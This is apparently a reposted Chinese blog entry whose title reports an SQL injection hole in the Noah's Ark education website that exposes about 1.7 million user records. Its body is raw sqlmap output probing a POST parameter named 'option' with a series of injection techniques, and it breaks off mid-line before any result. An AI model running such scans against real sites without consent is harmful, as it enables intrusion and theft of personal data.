当前位置:   article > 正文

info testing mysql_诺亚舟教育网SQL注入漏洞(涉及近170w用户信息)

testing if (custom) post parameter '#1*' is dynamic

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual

consent is illegal. It is the end user's responsibility to obey all applicable

local, state and federal laws. Developers assume no liability and are not respon

sible for any misuse or damage caused by this program[*] starting at 17:34:59[17:35:00] [INFO] testing connection to the target URL

[17:35:01] [INFO] testing if the target URL is stable. This can take a couple of

seconds

[17:35:02] [INFO] target URL is stable

[17:35:02] [INFO] testing if POST parameter 'option' is dynamic

[17:35:02] [INFO] confirming that POST parameter 'option' is dynamic

[17:35:02] [WARNING] POST parameter 'option' does not appear dynamic

[17:35:02] [WARNING] heuristic (basic) test shows that POST parameter 'option' m

ight not be injectable

[17:35:02] [INFO] testing for SQL injection on POST parameter 'option'

[17:35:03] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'

[17:35:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause

'

[17:35:05] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'

[17:35:06] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o

r HAVING clause'

[17:35:06] [WARNING] if you experience problems with non-ASCII identifier names

you are advised to rerun with '--tamper=charunicodeencode'

[17:35:07] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT

ype)'

[17:35:07] [INFO] testing 'MySQL inline queries'

[17:35:07] [INFO] testing 'PostgreSQL inline queries'

[17:35:08] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'

[17:35:08] [INFO] testing 'Oracle inline queries'

[17:35:08] [INFO] testing 'SQLite inline queries'

[17:35:08] [INFO] testing 'MySQL > 5.0.11 stacked queries'

[17:35:09] [INFO] testing 'PostgreSQL > 8.1 stacked queries'

[17:35:10] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'

[17:35:10] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'

[17:35:11] [INFO] testing '

声明:本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:【wpsshop博客】
推荐阅读
相关标签
  

闽ICP备14008679号